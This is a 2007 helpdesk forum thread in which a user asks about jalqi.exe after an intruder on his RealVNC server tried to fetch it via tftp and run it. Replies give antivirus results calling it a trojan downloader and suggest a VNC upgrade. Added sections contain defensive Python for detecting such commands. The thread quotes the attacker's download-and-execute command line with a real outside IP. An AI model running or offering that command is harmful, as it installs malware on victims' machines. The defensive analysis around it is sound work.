
what does the jalqi.exe? and how to clean it?

Status
Not open for further replies.

sugarferret

IS-IT--Management
Jul 11, 2005
33
US
Hi, yesterday I opened a RealVNC server port for support purposes from a company in Seoul, Korea. The support time was nice and useful; the thing here is that an illegal third VNC client/child (I don't know how some other person gained access to the VNC server) tried to run this command on my machine:
" %comspec% /c tftp -i 83.226.184.184 GET jalqi.exe & start jalqi "
Obviously he tried to copy a daemon from the 83.226.184.184 host (which is in Stockholm, Sweden) and bring it up.
The command was interrupted because I was typing at the time of the failed hack attack, so the command was not typed correctly, thank God.

Now, I would like to know what this daemon does and how I can be sure that I am not infected.

Thanks in advance!
Aldo

Live as a tortoise.
and rate my mullet:
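As an added example, not part of the original post: the defender's side of the command Aldo saw is a process-creation log check for a tftp GET chained into execution of the fetched file. The script below scans constructed records (the record layout `timestamp|host|user|command line` and all lines except the first, which is the command quoted above, are assumptions for this example) and reports which ones fetch a file with tftp and whether the same command line also launches it.

```python
import re
from dataclasses import dataclass

# Constructed process-creation records for this example, one per line:
# timestamp|host|user|command line. The layout is an assumption; adapt the
# split() to whatever your EDR, Sysmon or 4688 export actually emits.
# The first record is the command line quoted in the thread.
SAMPLE_LOG = """\
2007-02-03T10:15:01Z|ws01|aldo| %comspec% /c tftp -i 83.226.184.184 GET jalqi.exe & start jalqi 
2007-02-03T10:15:07Z|ws01|aldo|winvnc4.exe -service
2007-02-03T10:16:22Z|ws02|svc|cmd /c tftp -i 10.0.0.5 GET update.exe
2007-02-03T10:17:45Z|ws03|bob|cmd /c ftp -s:script.txt && start payload.exe
"""

# "tftp [-i] <remote> GET <file>": the Windows tftp client fetching a file.
TFTP_GET_RE = re.compile(
    r"\btftp(?:\.exe)?\s+(?:-i\s+)?(?P<remote>[\w.:\-]+)\s+get\s+(?P<file>[\w.\\\-]+)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    timestamp: str
    host: str
    user: str
    remote: str        # where the file was fetched from
    filename: str      # what was fetched
    executes: bool     # the same command line also launches the fetched file
    via_comspec: bool  # wrapped in %comspec% /c, as in the thread's command


def _launches_fetched_file(after: str, filename: str) -> bool:
    """True if the text following the tftp GET launches the downloaded file,
    e.g. '& start jalqi' for jalqi.exe (the extension is commonly dropped)."""
    stem = re.escape(filename.rsplit(".", 1)[0])
    chained = r"(?:&&?|\|\|?)\s*(?:start\s+)?" + stem + r"\b"
    return re.search(chained, after, re.IGNORECASE) is not None


def scan(log_text: str) -> list:
    """Return one Finding per record whose command line fetches a file with tftp."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        timestamp, host, user, cmdline = line.split("|", 3)
        m = TFTP_GET_RE.search(cmdline)
        if m is None:
            continue
        findings.append(Finding(
            timestamp=timestamp,
            host=host,
            user=user,
            remote=m.group("remote"),
            filename=m.group("file"),
            executes=_launches_fetched_file(cmdline[m.end():], m.group("file")),
            via_comspec="%comspec%" in cmdline.lower(),
        ))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        level = "HIGH" if f.executes else "MEDIUM"
        print(f"[{level}] {f.timestamp} {f.host}/{f.user}: tftp GET {f.filename} "
              f"from {f.remote} (executes={f.executes}, comspec={f.via_comspec})")
```

On the sample data the first record is reported as high (fetch and launch in one line) and the third as medium (fetch only); the plain ftp line is not matched. The chained-execution check is a heuristic; on a workstation, tftp fetching any executable from the outside is usually worth an alert on its own.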
 
A quick look at it shows it opens a URL and downloads something. So obviously it is a downloader of some sort. VirusTotal says:

Code:
AntiVir	7.3.1.34	02.03.2007	TR/Dldr.Agent.bft
Authentium	4.93.8	02.03.2007	no virus found
Avast	4.7.936.0	02.03.2007	no virus found
AVG	386	02.03.2007	no virus found
BitDefender	7.2	02.04.2007	Trojan.Downloader.Agent.BFT
CAT-QuickHeal	9.00	02.03.2007	no virus found
ClamAV	devel-20060426	02.03.2007	no virus found
DrWeb	4.33	02.03.2007	Trojan.Domort
eSafe	7.0.14.0	02.03.2007	Win32.Agent.bft
eTrust-InoculateIT	30.4.3364	02.02.2007	no virus found
eTrust-Vet	30.3.3366	02.03.2007	no virus found
Ewido	4.0	02.03.2007	Downloader.Agent.bft
Fortinet	2.85.0.0	02.03.2007	W32/Agent.BFT!tr.dldr
F-Prot	4.2.1.29	02.03.2007	no virus found
Ikarus	T3.1.0.31	02.03.2007	Trojan-Spy.Win32.Delf.OR
Kaspersky	4.0.2.24	02.04.2007	Trojan-Downloader.Win32.Agent.bft
McAfee	4955	02.02.2007	no virus found
Microsoft	1.2101	02.03.2007	no virus found
NOD32v2	2035	02.03.2007	probably unknown NewHeur_PE virus
Norman	5.80.02	02.02.2007	W32/Backdoor.AG
Panda	9.0.0.4	02.03.2007	Trj/Agent.DYV
Prevx1	V2	02.04.2007	no virus found
Sophos	4.13.0	02.02.2007	Troj/Agent-EBJ
Sunbelt	2.2.907.0	02.02.2007	no virus found
Symantec	10	02.04.2007	no virus found
TheHacker	6.0.3.162	02.02.2007	Trojan/Downloader.Agent.bft
UNA	1.83	02.03.2007	TrojanDownloader.Win32.Agent.23FE
VBA32	3.11.2	02.03.2007	Trojan-Downloader.Win32.Agent.bft
VirusBuster	4.3.19:9	02.03.2007	no virus found

It is PE packed and has a few versions of ASPack on it as well, so without really getting into it and possibly doing a live analysis (I currently lack a machine to sacrifice for testing), unfortunately I can't give you much more than that.

----------------------------
"Will work for bandwidth" - Thinkgeek T-shirt
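An added example, not part of the post above: a small Python parser for the VirusTotal block quoted there. It reads the tab-separated engine results, splits verdicts into clean, heuristic and named-family detections, computes the detection ratio, and counts how many named verdicts agree on the "Agent.bft" family and on "downloader" behaviour. The classification keywords and family rules are my assumptions for this example; the data is the table from the post.

```python
from collections import Counter

# The VirusTotal block quoted in the post above, tab-separated:
# engine, signature version, signature date, verdict.
VT_RESULTS = """\
AntiVir\t7.3.1.34\t02.03.2007\tTR/Dldr.Agent.bft
Authentium\t4.93.8\t02.03.2007\tno virus found
Avast\t4.7.936.0\t02.03.2007\tno virus found
AVG\t386\t02.03.2007\tno virus found
BitDefender\t7.2\t02.04.2007\tTrojan.Downloader.Agent.BFT
CAT-QuickHeal\t9.00\t02.03.2007\tno virus found
ClamAV\tdevel-20060426\t02.03.2007\tno virus found
DrWeb\t4.33\t02.03.2007\tTrojan.Domort
eSafe\t7.0.14.0\t02.03.2007\tWin32.Agent.bft
eTrust-InoculateIT\t30.4.3364\t02.02.2007\tno virus found
eTrust-Vet\t30.3.3366\t02.03.2007\tno virus found
Ewido\t4.0\t02.03.2007\tDownloader.Agent.bft
Fortinet\t2.85.0.0\t02.03.2007\tW32/Agent.BFT!tr.dldr
F-Prot\t4.2.1.29\t02.03.2007\tno virus found
Ikarus\tT3.1.0.31\t02.03.2007\tTrojan-Spy.Win32.Delf.OR
Kaspersky\t4.0.2.24\t02.04.2007\tTrojan-Downloader.Win32.Agent.bft
McAfee\t4955\t02.02.2007\tno virus found
Microsoft\t1.2101\t02.03.2007\tno virus found
NOD32v2\t2035\t02.03.2007\tprobably unknown NewHeur_PE virus
Norman\t5.80.02\t02.02.2007\tW32/Backdoor.AG
Panda\t9.0.0.4\t02.03.2007\tTrj/Agent.DYV
Prevx1\tV2\t02.04.2007\tno virus found
Sophos\t4.13.0\t02.02.2007\tTroj/Agent-EBJ
Sunbelt\t2.2.907.0\t02.02.2007\tno virus found
Symantec\t10\t02.04.2007\tno virus found
TheHacker\t6.0.3.162\t02.02.2007\tTrojan/Downloader.Agent.bft
UNA\t1.83\t02.03.2007\tTrojanDownloader.Win32.Agent.23FE
VBA32\t3.11.2\t02.03.2007\tTrojan-Downloader.Win32.Agent.bft
VirusBuster\t4.3.19:9\t02.03.2007\tno virus found
"""

CLEAN = "no virus found"


def parse_results(text: str) -> list:
    """One dict per engine line: engine, version, date, verdict."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        engine, version, date, verdict = line.split("\t", 3)
        rows.append({"engine": engine, "version": version, "date": date, "verdict": verdict})
    return rows


def classify(verdict: str) -> str:
    """'clean', 'heuristic' (generic / unknown-sample verdict) or 'named'
    (a family signature). The keyword rules are an assumption for this example."""
    v = verdict.lower()
    if v == CLEAN:
        return "clean"
    if "heur" in v or "probably" in v or "suspicious" in v or "generic" in v:
        return "heuristic"
    return "named"


def summarize(text: str) -> dict:
    """Detection ratio plus how many named verdicts agree on family and behaviour."""
    rows = parse_results(text)
    kinds = Counter(classify(r["verdict"]) for r in rows)
    families = Counter()
    for r in rows:
        if classify(r["verdict"]) != "named":
            continue
        v = r["verdict"].lower()
        if "bft" in v:                       # vendors naming the Agent.bft variant
            families["agent.bft"] += 1
        if "downloader" in v or "dldr" in v:  # vendors describing it as a downloader
            families["downloader"] += 1
    detected = kinds["named"] + kinds["heuristic"]
    return {
        "engines": len(rows),
        "detected": detected,
        "ratio": f"{detected}/{len(rows)}",
        "kinds": dict(kinds),
        "families": dict(families),
    }


if __name__ == "__main__":
    s = summarize(VT_RESULTS)
    print(f"detected by {s['ratio']} engines; {s['kinds']}; family agreement {s['families']}")
```

For this table the script reports 15 of 29 engines detecting, one of them only heuristically, with eight vendors agreeing on Agent.bft and eight describing a downloader. That split is the useful part of a multi-engine result: a sample that half the engines miss while the others agree on a downloader family is a recent variant, not a false positive, which matches the "downloader of some sort" reading in the post above.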
 
What you need to do is upgrade your VNC to 4.1.2 as the versions older than 4.1.2 had a nasty little bug that bypassed authentication.

RoadKi11
 
Actually I have 4.2.x... by the way, how is it possible that a third person can gain access to the RealVNC session?



 
Not sure. If you are using 4.2.x then you are using the Enterprise version according to the website; I've never used anything but the free version, which is at version 4.1.2. Maybe the Enterprise version allows multiple connections. It looks like the Enterprise version is at 4.2.8; if you are not up to that level I would upgrade it, as I'm sure the older versions of Enterprise were also affected by the bypass bug.

RoadKi11
 